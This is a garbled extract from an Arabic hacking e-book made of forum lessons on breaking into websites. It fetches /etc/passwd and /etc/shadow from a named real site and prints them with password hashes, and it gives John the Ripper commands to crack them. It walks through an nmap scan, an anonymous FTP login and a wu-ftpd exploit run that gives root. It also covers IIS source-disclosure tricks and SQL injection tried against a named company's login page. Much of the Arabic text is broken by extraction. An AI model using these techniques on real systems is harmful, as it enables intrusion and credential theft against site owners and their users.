------------------------------------------------------------------------------------------------<br />
وقدتكونأكثر بكثیر ، حیثأن هذاالمل فالموضحبالأعلىأختصربشكلكبیر، فعندسحبهكان یحتوي<br />
على آلالا ف السطور ،لیسكل ملفا تكلماتالمروربهذا ال حجمفیوجد منها من لایتجاوز <strong>١</strong>٠أسطر وهي<br />
الموجوده بكثره ، علىالعمومأنت ال حین علیكتعر ف بأن مل فكلمة المرور هو الذيفي داخلهتوجد<br />
حساباتالأشخا صالمرخ صلهمبالدخول الى السیرفر ......<br />
-بماذا یفیدني هذا الملف ؟<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
یفیدك یاالحبیبفيمعرفهكلماتالسروإسماءالمستخدمینلكيتقوم بإختراق الموقع ، ولكنلاتفرح<br />
كلمة المرورتكون مشفره ، لا هذالیس ص حیحاتماما ،كانت مشفره زمان ولكنفي الوقت الحالي هي<br />
مضلله<br />
وا* = xكلمة سر مضلله Shadowed<br />
= EpGw4GekZ1B9Uكلمة سر مشفره على مقیاس ، DES هذا النو ع منالتشفیرالمستخدمفي<br />
لیونكس و FreeBSD وعدد منالأنظمه الأخر ىضعی ف ، وهو دائما مكون من <strong>١</strong>٣ حر ف ورقمكبتل<br />
وسمول ولا یحتوي منبینها على رمزابداً، بإ ستثناء ویندوزفهو یستخدم نوع آخر منالتشفیر وهو نوع<br />
ضعی فأیضا.<br />
!...<br />
-كیف یمكنمعرفةكلمة السر من خلال مل ف الباسورد password؟ file<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
إ ضغط Ctrlفي + Shift القسمالأیمن منلوحهالمفاتیح لتقراء منالیسارالى الیمین ،ثمإ ذهب الى<br />
الاعلى حیث وضعت مثاللمل فكلمة مرورتم سحبه منالموقع ... hwwilson.<strong>com</strong><br />
تفسیر هذاالسطر<br />
- :<br />
root:x:0:1:Super-User:/:/sbin/sh<br />
root<br />
x<br />
هذا السطر یوضخالمستخدم واللي هوالجذرroot<br />
هيكلمةالمرور ، ویتضحانها مضلله، یعني مكانها العلامة ، x لاتفكرفيكسرهافهذا مست حیل ،<br />
لكن علیك الب حث عن مل فثانيتمتخزینفیهكلمةالمرور، ستعر ف بعدقلیلكی فتفعل هذا..<br />
0<br />
هذا هو رقم المستخدم<br />
1<br />
رقمالمجموعه<br />
Super-User:/:/sbin/sh و هذا م ش مهم<br />
++++++++++++++++++++++++++++<br />
الجزء الثالث<br />
-ماالفر قبینإ ذاكان المل ف (مشفر encryption) وإ ذاكان (مضلل (shadowed؟<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
المل ف المضلل shadow file یكون مكانكلمةالمرور رمز مثل *أو xأو #أو مثاللها ! وهذا<br />
root:x:0:1:Super-User:/:/sbin/sh لكنالمل فالمشفرتكونكلمة المرور مكتوبه ولكن<br />
مشفره مثل هذه root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh<br />
<strong>١</strong>٥<strong>١</strong>
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
هناتكونكلمةالمرور المشفره هي Q71KBZlvYSnVw<br />
الآن طلعتالصوره صافیه ....<br />
-وماذالوكان مل فكلمة المرور مشفر ،كی فیتمكسره ؟<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
البرامجكثیره وأشهرها هو Crack 5.0a و john the ripper ویوجد آخربإسم jack the<br />
ripper ،<br />
the ripper<br />
.....<br />
-:<br />
.<br />
--------------------------------------------------- \ Q2wrtUo9LPq2R البدایه (كلمةالمرورالمشفره) معأخذكلمة منال wordlist الكلمات المختاره حتى یتم<br />
word list التطاب ق-> Q6LiJ6ct1oUBzكلمة مرور مشفره مع الكلمة المختاره من القائمة<br />
ولنفر ض مثلا song فاذا حد ثتطابقفهذا یعنيأنكلمةالمرورالتيكانت مشفرهقدكسرت<br />
..<br />
| ------------------------------------------------------------------------------- |ملاحظه مهمه -:<br />
یتم عمل دوره مثل الموضحهفيالأعلىلكسركلمات المرورالمشفرهبسرعه<br />
٥٠٠٠تجربهفيالثانیه إختبرناripper johnعلىمعالجبسرعه the<br />
(٧٠٠<br />
)<br />
}النهایه} |<br />
| -------------------------------------------------------------------------------<br />
لتشغیل john the ripper<br />
من واجه دوس نكتبالأمرالتالي<br />
john -w:wordlist passwd<br />
حیث wordlistهو مل فالقاموس الذي یحتوي على عددكبیر منالكلمات<br />
و passwdهوالمل فالذيیحتوي علىكلماتالمرور المشفره والتي نودمعرفتها<br />
-------------------------------------------------------------------------------<br />
Microsoft(R) Windows 98<br />
C)Copyright Microsoft Corp 1981-1998.(<br />
E:\Desktop\junk\john the ripper>john -w asswd passwd.txt<br />
by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996<br />
Loaded 1 password<br />
**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE<br />
>E:\Desktop\junk\john the ripper<br />
------------------------------------------------------------------------------------------------<br />
...<br />
وسو فتحفظالنتیجهفي المل ف john.pot الموجودفي نفس الدایروكتري ، وعلیك حذ ف هذا المل فإ ذا<br />
أردتالبدءفي عملیهكسر جدیده ویمكنكتغییرإسمهأو نقلهفي مكان آخربدل من حذفهإ ذاكنتتر ى ذلك<br />
هناك طریقهاخرىللكسر وهيتسمىب bruteأوبالعربيالقوهالعنیفه force ، وهي لاتحتاجلمل ف<br />
<strong>١</strong>٥٢
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
...<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
..<br />
، wordlistهيتقوم بتجربهكلالحرو ف والأرقام والرموز مع بع ضفي خانتان و ٣ خانات واربع<br />
وخمس الخ حتىتصیبكلمةالمرورالص حیحه ، وأناافضلانتستخدم ملفات wordlistفذلكلن یأخذ<br />
معكفيالاثوانيفقطلأن عملیهالتجربه الموضحهفيالرسمبالأعلى ذكرت بأنه سرعةتجربه الكلمات<br />
یتجاوز ٥٠٠٠كلمةفيالثانیه ،إ ذالمتفلح ملفات wordlist حینهاإ ذهب الى القوهالعنیفه brute<br />
.... force الأمرالتالي یجعل johnیستخدم the ripper طریقه brute force السابق ذكرها<br />
john -i passwd<br />
حیث passwdهو مل فكل مةالمرورالمرادكسره ،إ ذاقمت بتجربه هذه الطریقهإ ضغ ط إنتر أثناء عمل<br />
البرنامج لتر ىالىأینتوصل<br />
-ولوكان مل فكلمةالمرور مضلل ، ماذا عليانأعمل ؟<br />
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />
دائما سو فتواجهكلمة مرور مضلله ،لكنهناك طریقهتسمى Unshadowلحل هذهالمشكله<br />
إ ذا واجهت ملف مضلل علیك الب حث عن مل فثاني یسمى مل ف الشادو (مل ف الظل) shadow file<br />
وهذاالمل ف یوجدفيامكنهمعینه وكل نظامتشغیلله مكان یوضعبه هذا المل ف ، الیكالجدول التالي<br />
:<br />
!!<br />
Linux : /etc/shadow token = *<br />
= token SunOSیأخذأشكال : /etc/shadow متعددهاشهرها هو *<br />
x هو FreeBSDوالجدید : /etc/master.passwd or /etc/shadow token = *<br />
IRIX : /etc/shadow token = x<br />
AIX : /etc/security/passwd token = !<br />
ConvexOS : /etc/shadow or /etc/shadpw token = *<br />
token<br />
تعني الرمز الذي یوجدفيالمل ف ، passwd وهذا یفیدفيتسهیلالمهمه، یعنيلو مثلالقیت<br />
علامه !بدلكلمه المرورفهذایعنيانكلمة المرور مسجلهفي ، etc/security/passwd/لقد<br />
إ ستعنتبالجدولالسابق ذكره ، مثال على مل ف شادو أكرر مل ف شادوهو المل فالذيتخزنفیهكلمة<br />
)<br />
المرورالص حیحه (<br />
هذا مل ف shadow<br />
------------------------------------------------------------------------------------------------<br />
root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::<br />
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::<br />
lp:NP:6445::::::<br />
------------------------------------------------------------------------------------------------<br />
نلاحظانكلمات السر موجوده<br />
الخطوه الأ خیره وهي دمج مل فالباسورد passwd file مع shadowلن passwd حصل على مل ف<br />
متكامل ونقدمهالىبرامج الكسرالسابق ذكرها...<br />
هذا مل فباسورد حصلنا علیه من http://wilsonweb2.hwwilson.<strong>com</strong>/etc/passwd<br />
------------------------------------------------------------------------------------------------<br />
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:<br />
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer<br />
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp<br />
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp<br />
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network<br />
Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:<br />
<strong>١</strong>٥٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
noaccess:x:60002:60002:No Access User:/:<br />
nobody4:x:65534:65534:SunOS 4.x Nobody:/:<br />
www:x:102:1001::/web:/bin/csh<br />
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu<br />
sid:x:103:10::/export/home/sid:/bin/ksh<br />
mirror:x:104:1::/home/mirror:/bin/sh<br />
admin:x:105:1::/home/admin:/bin/sh<br />
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh<br />
landmark:x:1000:1000::/web/landmark:/bin/ksh<br />
------------------------------------------------------------------------------------------------<br />
ومنال token الموضح واللي هو x نعر ف من خلالالجدولالسابق ذكره بأنكلمة المرورالص حیحهفي<br />
الدلیل /etc/shadow<br />
إذننتوجهبالمتصفح الى<br />
http://wilsonweb2.hwwilson.<strong>com</strong>/etc/shadow<br />
لن حصل على المل ف<br />
------------------------------------------------------------------------------------------------<br />
root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445::::::<br />
bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445::::::<br />
smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445::::::<br />
listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445::::::<br />
nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507::::::<br />
mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515::::::<br />
mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976::::::<br />
jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982::::::<br />
landmark:0jCgWu6vl8g0s:11185::::::<br />
------------------------------------------------------------------------------------------------<br />
نقومبنسخكلمات السرالموجودهفیه ولصقها مكان علامه xفي مل فالباسورد ، وهكذا مع جمیع<br />
ال حسابا تلن حصل على مل فكلمة مروركامل ومتكامل ونقدمهالىبرامج الكسر<br />
ملاحظه مهمه<br />
علیكجعلكل حسابفي سطر، یعنيتربتها لتعر ف علیهابرامج الكسر<br />
-:<br />
...<br />
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />
مواقعتستحق الزیاره :-<br />
أرشی فلثغرات<br />
www.securiteam.<strong>com</strong>/exploits/archive.html<br />
أرشی فلثغرات<br />
http://www.ussrback.<strong>com</strong>/<br />
أرشی فثغرات +الكثیر<br />
http://www.secureroot.<strong>com</strong>/<br />
أرشی فثغرات<br />
http://rootshell.redi.tk/<br />
أرشی فثغرات<br />
<strong>١</strong>٥٤
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
http://www.ussrback.<strong>com</strong>/<br />
مواقعلثغرات<br />
www.secureroot.<strong>com</strong>/category/exploits<br />
دلیللمواقعالهاكینق<br />
www.hitboss.<strong>com</strong>/Hacking<br />
محركبحث لا غني عنه<br />
www.undergroundnews.<strong>com</strong>/resources/s...ound/search.asp<br />
Warez.<strong>com</strong>-Underground<br />
http://www.warez.<strong>com</strong>/<br />
Hacking<br />
(ممتازلمن یریدالبدایه)<br />
http://www.neworder.box.sk/<br />
Security Search Engine<br />
http://www.bugs2k.<strong>com</strong>/<br />
insecure<br />
http://www.insecure.org/<br />
<br />
http://public.www.easynet.co.uk/cgi...ail/formmail.pl<br />
...<br />
<strong>١</strong>٥٥
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
"<br />
درس في اختراق المواقع<br />
(متوسط) "<br />
...<br />
$$$$$$$$$$<br />
الكاتب: ICER<br />
$$$$$$$$$$<br />
)<br />
الادواتالمطلوبه :شیلاكاونت اذابحثتفي جوجل سو فتجدالكثیر منالشیلز و طبعاالناسالمحترمه<br />
احمممم) بتركبلینكساو یونیكسوتعی ش حیاتها وتریح نفسها...في ناستانیه ماتحب شاللینكس<br />
الشیلاكاونتكویسلها و ممكن یمشي وانا عن نفسي م ش حاستعملالاتنین<br />
بسبالنسبهللي حیستعملوالشیل لازمیتاكدوانهبیسمحبالبرامجالاساسیه زي<br />
(:<br />
nslookup, host, dig, ping, traceroute,telnet, ssh, ftp<br />
واساسي لازمال gcc عشانتعر فتعملكومبایل...(یا عم ركبلینكس و ریح نفسك ( و طبعاالادوات<br />
واخر حاجه هيالاكسبلویت<br />
دي<br />
بع ضالملحوظات الهامه :<br />
الشیلاكاونت شبیه جدابالدوس معاختلا ففيالاوامر والوظائ ف ..م ش حناق شكیفیهال حصول على<br />
واحد لانفیه مواضیعكثیره اتكلمت علیه.<br />
٢-اداهال nmap هي عباره عنبورت سكانر متقدم .<br />
٣-ال NetCat هياداه شبیهبالتلنت وتقومبرفعبیانا تلسیرفیرمعین .<br />
٤-الاكسبلویتاتهي عباره عنبرامج غالباتكون مكتوبهبلغهالسي و هيتقومباعطائككافهالصلاحیات<br />
فهيتخترق جهازمعین وتقوم بعملكل شيءانتتریده ممكنتلاقیهافین؟؟؟<br />
مواقعالسیكیوریتي علىافه من یشیل...دور ولو مالقیت شقولي واناادیلككام موقعتجیب منهالحاجات<br />
دي....<br />
المواقع المرتبطهبالموضو ع<br />
.<br />
nmap and netcat<br />
*<br />
-<strong>١</strong><br />
:<br />
*<br />
(a) Linux (http://www.slackware.<strong>com</strong><br />
(b) Nmap (http://www.insecure.org<br />
(/c) NetCat (http://www.l0pht.<strong>com</strong>/~weld/netcat<br />
الخطوات :-<br />
<strong>١</strong>- ركبالینكس و خ ش عالنت (م شقلتلك مفیشاحسن مناللینكس<br />
٢- ركبالاداه nmap متبعا التالي<br />
( P:<br />
:<br />
tar zxvf nmap.tar.gz (<strong>١</strong>*<br />
cd nmap (٢<br />
configure && make && make install/. (٣<br />
٣-شو ف الموقعالمستهد ف ولیكن<br />
nslookup www.target.<strong>com</strong><br />
..<br />
www.target.<strong>com</strong><br />
٤- شو فالايبيتبعالموقعباستخدام<br />
هذا سو فیعر ضلكالايبيللموقع ولیكن <strong>١</strong>٩٦٫<strong>١</strong>٫٢٫٣<br />
٥- شو ف الخدماتالليبیقدمهاالموقع وكمان شو ف نظامالتشغیل متبعا التالي :-<br />
"nmap -sS -O 196.1.2.3"<br />
<strong>١</strong>٥٦
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
- :<br />
root@IcEr:~# nmap -sS -O 196.1.2.3<br />
( /Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap<br />
:(Interesting ports on www.target.<strong>com</strong> (196.1.2.3<br />
(The 1531 ports scanned but not shown below are in state: closed)<br />
Port State Service<br />
tcp open ftp/٢<strong>١</strong><br />
tcp open smtp/٢٥<br />
tcp open http/٨٠<br />
tcp open sunrpc/<strong>١</strong><strong>١</strong><strong>١</strong><br />
tcp open auth/<strong>١</strong><strong>١</strong>٣<br />
tcp open printer/٥<strong>١</strong>٥<br />
tcp open unknown/٩٦٣<br />
tcp open kdm/<strong>١</strong>٠٢٤<br />
tcp filtered krb524/٤٤٤٤<br />
tcp open X11/٦٠٠٠<br />
tcp filtered napster/٦٦٩٩<br />
OS guess for host: Linux 2.2.14-2.2.16<br />
(Uptime 0.160 days (since Mon Apr 30 14:51:06 2001<br />
Nmap run <strong>com</strong>pleted -- 1 IP address (1 host up) scanned in 67 seconds<br />
#~:root@IcEr<br />
المفرو ضانه یدیك مخرجات شبه الكلام ده<br />
تمامكده یا شباب نكمل...<br />
الكلام دهكله عباره عناستكشا فللموقع یوریك البورتاتالمفتوحه..ممكنتشو فلوكانفیه<br />
daemon شغال علىالموقع و لا في المثال الليفوق حنلاقیه موجود و دهكویس<br />
شو فايفیرجین من FTP daemon موجوده متبعاالتالي<br />
"telnet 196.1.2.3 21"<br />
او<br />
"ftp 196.1.2.3"<br />
اي منهم حیدیكبانرفیهالفیرجین بتاعهالا فتيبي دیموناللي شغاله علىالسیرفیر ممكن یكون زيكده<br />
FTP<br />
-:<br />
root@IcEr:~# ftp 196.1.2.3<br />
.Connected to 196.1.2.3<br />
www.target.<strong>com</strong> FTP server (Version wu-2.6.0(1) Mon Mar 6 ٢٢٠<br />
(13:54:16 SAST 2000<br />
.ready<br />
Name (target:root): anonymous<br />
.Guest login ok, send your <strong>com</strong>plete e-mail address as password ٣٣<strong>١</strong><br />
:Password<br />
Wel<strong>com</strong>e, archive user! This is an experimental FTP server. If have -٢٣٠<br />
any<br />
(:<br />
<strong>١</strong>٥٧
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
unusual problems, please report them via e-mail to -٢٣٠<br />
root@IcEr.pandora.net<br />
If you do have problems, please try using a dash (-) as the first -٢٣٠<br />
character<br />
of your password -- this will turn off the continuation messages -٢٣٠<br />
that may<br />
.be confusing your ftp client-٢٣٠<br />
-٢٣٠<br />
.Guest login ok, access restrictions apply ٢٣٠<br />
.Remote system type is UNIX<br />
.Using binary mode to transfer files<br />
ftp>by<br />
#~:root@IcEr<br />
منالكلام دهتقدرتعر فانالفیرجینالموجوده هي .wu-2.6.0<br />
وایضااحنا حاولنا نخشكمجهولین anonymous وكان تاعملیه ناجحه؛)<br />
صلي علىالحبیب المختار #######<br />
٧او ٨ م شفاكر المهمانهااهم خطوه<br />
احصل علىالاكسبلویت بتاعهالفیرجین دیه من .FTPd ) الليیعمل سیر ش میتوه ش (<br />
و لتكن<br />
المهملو شفتالسورسكود بتاعها حتلاقيانها متكوده عشان نظامتشغیلمعین ولیكن<br />
و یا سلاملوكانالموقعالمستهد فبیعمل على نظامالتشغیل دهكده یبقىكلالليتعملهانكتعملكومبایل<br />
للثغره دي وبشغلها على سیرفرالموقع المستهد ف وكده حیدیك<br />
red hat 6.2<br />
-:<br />
wuftpd2600.c<br />
#######<br />
root access<br />
root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3<br />
Target: 196.1.2.3 (ftp/): RedHat 6.2 (?) with wuftpd 2.6.0(1)<br />
from rpm<br />
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152<br />
..loggin into system<br />
USER ftp<br />
.Guest login ok, send your <strong>com</strong>plete e-mail address as password ٣٣<strong>١</strong><br />
hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
man gcc<br />
..<br />
!Bang! You have root<br />
طبعاانا نسی تامر الكومبایل ..شو فالامر ده<br />
و هوه حیدیلكمعلوماتكامله عنامر الكومبایل بكلالخیارات الليمعاهكده یبقىاناكده عملت اللي<br />
علیه محد ش یسالنيباه بعدكده و یقولي یاواد یاایسراعملایه<br />
..<br />
search..U will find what U wanna<br />
...<br />
بع ضالثغرات بتحتاجه..<br />
اه نسی ت ..محد ش سالنياعملبالنتكات بعدكده طیب لو لاحظ تاننااستغلینا خاصیهال annonymous الموجوده ..لاكنلوكانتالخاصیهدي م ش<br />
موجوده ..یبقى م ش حنعر ف نكمل الكلام ده ..... عشانالاكسبلویت م شتشتغل في هذهالحاله<br />
الاكسبلویت مشتشتغلالالو معاناباسورد و یوزر نیم عشان نخ ش علىالا فتيبي بتا ع الموقع..<br />
صبیها..بس<br />
خا عشانكده لازمتقراالسورس بتا عالاكسبلوی ت..وكل اكسبلویتلها ساینتكس و شغل المبادئالاساسیه واحده....<br />
..<br />
<strong>١</strong>٥٩
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
" اختراق الSQL "<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$<br />
الكاتب: linuxray<br />
$$$$$$$$$$$$<br />
س:فيالبدایة ماهيالاسكیوال<br />
) SQL )؟؟<br />
الاسكیوال هي عبارة عنقاعدبیاناتتحتوي على جداول واغلبالمواقعالتيتكون صفحاتها منتهیة ب<br />
ASP هي صفحا تتسحببیاناتها منقاعدة SQL وصفحات ASP ممكنانتكونكنز منالمعلومات<br />
لاختراققواعدبیاناتQLS وهذا ماسو فاشیرالیه لاحقا ، و SQL تتنصت علىالبورت <strong>١</strong>٤٣٣<br />
ایضا مااریداناخبركبهانال SQLقدتحتوي على اكثر منقاعدةبیانات وكلقاعدةبیاناتتحتوي<br />
على عدد منالجداول یمكن<br />
ان تتصوركبرقواعدبیانات SQL والعددالكبیر منالبیاناتالتىتحتویها .<br />
س: مالذيیمكناناستفید منهاذااخترقتقاعدةبیانات SQL ؟<br />
هذا على حسب نشاطالموقعاذاكان هذا الموقع منتد ى لااقصد منتدیات PHPبل منتدیات ASPفي<br />
الغالب سو فت حصل على جمیعاسماء<br />
المستخدمین وكلماتالسر وبامكانكتعدیل وحذ فاي موضوع وصلاحیاتلمتكنت حلمبها ،امااذاكا ن<br />
الموقع یحتوي على میزة<br />
قائمةالمراسلا تفسو فت حصل علىاعداد خیالیة منالایمیلات ، عندهاقمبانشاء شركةللدعایة والاعلان<br />
وسو فتصبحثریااذنلاتنسى LinuxRay_<br />
توقعانتجداي شئ داخلقواعدبیاناتمعلوماتاشخا ص -ارقام هوات ف<br />
ممكنانتصبح<br />
اعر فانهقداصابك المللالانلكناستعد نشاطك من جدیدفالطریق مازال طویلا<br />
- عناوین -تورایخالمیلاد ،<br />
...<br />
. Administrator<br />
س: مالذيتحتاجةللدخول علىقواعدبیانات SQL ؟<br />
تحتاجفقطلل User Name و Passwd<br />
س: منایناحصل علىاسم المستخدم وكلمةالمرور ؟<br />
هناك طرق عدیدةلل حصول على User name and Passwd منهاكمااسل ف صفحاتال ASP<br />
وملفاتاخرى من نو ع *.sqlهناكثغراتكثیر یمكن<br />
انت حصل منها علىكلمات المرور مثلثغرة htr.+<br />
كی فتستخدم هذهالثغرة<br />
:<br />
htr.+asp.page/target//:http<br />
target :الموقعالهد ف<br />
asp صفحة : Page<br />
htr.+ :الثغرة<br />
هذه الثغرةتقوماحیانا بفتح صفحةبیضاءلاتحتوي علىاي حر ف ....اعر فانك سوف تتساءل مالفائدة<br />
اذن منهاالفائدة هو<br />
خل ف هذهالصفحةالبیضاءاذهبالى Viewلكيتر Source ىاوامرالبرمجةالخاصة ب ASP التى<br />
<strong>١</strong>٦٠
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
لایمكنلكانتراهافي الوضع العادي<br />
: مثل<br />
%><br />
("Connection.ADODB")CreateObject.Server =Set DB<br />
SQL =DRIVER"Open .DB<br />
Developer (R)Microsoft ؛PPA= =sa;PWD=xxx;UID=Server;SERVER<br />
"٦٦٦٦٦٦٦" ،"yaRxuniL_" ،"moe_dbs=xxx;DATABASE=Studio;WSID<br />
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
لی س منالضرورةانتكونالملفاتبهذهالاسماءلكن هذا هو المعتاد علیه منقبل مبرمجین SQL<br />
وكل ماعلیك فعلهانتكتباسمالصفحة مثلالاتي<br />
:<br />
htr.+asa.global<br />
هناكثغرةقدیمةفي ٣IIS وهيانتضی ف بعد صفحة ASP هذاالرمز ::$atadكما یلي<br />
atad$::asp.file<br />
هذه الثغرةلاتعملالا على ٣IISفلا تتعب نفسك بتطبیقهافقطللعلم لااكثر<br />
.<br />
لقداقتربنا من النهایة<br />
... ماذا بعدال حصول علىاسم المستخدم وكلمة المرور ؟؟<br />
بعدهاالدخول علىقاعدةال !! SQL<br />
هناك عدةبرامجتدخل علىقاعدةالبینا تانااستخدم ٦٫٠لكني Visual interdev مازلتافضل<br />
استخدام البرنامجالسهل<br />
٢٠٠٠ACCESS<br />
كل ما علی ك فعلههو فتح البرنامح الذهاب الىقائمة<br />
File<br />
اختر<br />
New<br />
ومنقائمةالملفاتالجدیدةاختار<br />
.<br />
(Exiting Data)Project<br />
اي مشرو عقاعدةبیانات موجودة<br />
سیظهرلك مربع لانشاء الملفاختر<br />
Create<br />
ايانشاء<br />
الان سترى مربع<br />
Data Link Properties<br />
تحتاجفق طلثلا ثمعلوما تاسم الموقعاوالايبي-اسمالمستخدم -كلمة المرور<br />
Select or enter server name<br />
<strong>١</strong><br />
-ادخلاسمالموقعفي صندوق<br />
٢ -اسمالمستخدمفي User Name<br />
٣<br />
-كلمة السر Password<br />
ملاحظة (قم بإزالةالصح من مربع (Blank Password<br />
اضغطفي البدایة على Testفيالاسفل Connection لاخ تبارالاتصال بقاعدةالبیانا تاذا رأیت هذه<br />
<strong>١</strong>٦٢
hi_HaCkEr & MaXhAk2000<br />
:<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
العبارة Test Connection Succeeded<br />
فمعناهانالاتصال بقاعدةالبیاناتتمبنجاح.<br />
یمكنكالانانتختارايقاعدةبیاناتترید الدخولالیها منالقائمةالمسندلة<br />
Select the data base on the server<br />
واضغط على OKاو موافق ...<br />
<strong>١</strong>٦٣
hi_HaCkEr & MaXhAk2000<br />
<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />
" درس مفصل عن الSQL "<br />
<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />
$$$$$$$$$$$$$<br />
الكاتب: hish_hish<br />
$$$$$$$$$$$$$<br />
أتجهت غالبیةالمواقع لإ ستخدام صفحات دینامیكیه ومنها ما ن حن موجودینفیه :)<br />
وتستخدمقواعدبیانا تفیهاكمكبیر من المعلوما ت,<br />
وعن طریق سكربت مكتوببإ حد ىلغات الویبالدینامیكیه PHPأوASP والتيتعمل جمباإلى جمب مع<br />
محركاتقواعدالبیانات<br />
.<br />
SQL Server , MySQL,Oracle<br />
یتمأستخلا ص المعلوماتالمطلوبهوتركالبقیه<br />
حی ثتأخذمعلومات منالمستخدم ومنثمتعالج ویستخدم بعضهافيتكونأوامرال SQLلیتمأستخلا ص<br />
البیانا تأوالتأكد منصحة بع ض المدخلاتلبناءالصفحةالمطلوبهأوقبولالمستخدمأو رفضه دائمایتم<br />
طلبأسم مستخدم وكلمة مرورفيالصفحاتالتيتخولك بعمل عمل لا یقومبهإلا منقام صاحب الموقع<br />
بإعطائهالصلاحیهللقیامبهاكأن یقومبحذ ف موضوعي :)أوتثبیتهفي القائمه<br />
حی ثیتمالتأكد من وجودأسمالمستخدمفيقاعدةالبیاناتوأنكلمةالمرورالمعطاه مطابقه لتلكالموجوده<br />
بجانبأسم المستخدم حی ثیتمأخذ معلومهوتضمینهافيأمرال SQL الذي یقومبالتأكد من وجودها<br />
وصلاحیتها ولكن یجب الحذر عند كتابة سكربت یقوم بتوثیق المستخدملل تأكد منأنه مخوللهبالدخول<br />
للصفحه المحمیهأم لا وذلكبالتأكد من نظافةالقیمالمستقبله منالمستخدم وخلوها منأي رموز من شأنها<br />
أنتجعلأمر ال SQL خاطئفيبنائهأوالقیام بأيأمر غیر مسموحبه<br />
((((:<br />
سنتكلمالآن عن ما یسمى SQL injection<br />
حیثأنهضع ففي كتابة سكربت التوثیق وأیضابوجود موقعللتجربه<br />
وهو موقع شركةالإتصالاتالسعودیه<br />
عنوان الموقع http://www.stc.<strong>com</strong>.sa/<br />
عند الدخولللصفحةالرئیسیه نجد رابط یخت صبمقدمي خدمةأنترنتفيالسعودیه<br />
وهو<br />
عنددخولهفأنه یطلب منكأسم مستخدم وكلمة مرور<br />
دائمافيالحاله هذهأول مایتبادرلنا هو الinjection SQL<br />
نقوم بتجربة<br />
http://www.stc.<strong>com</strong>.sa/arabic/scripts/ar_frame.asp?pagenum=25<br />
!!!!<br />
أسم مستخدم : '<br />
وكلمة مرور' :<br />
فن حصل علىالخطأ التالي<br />
اقتباس :<br />
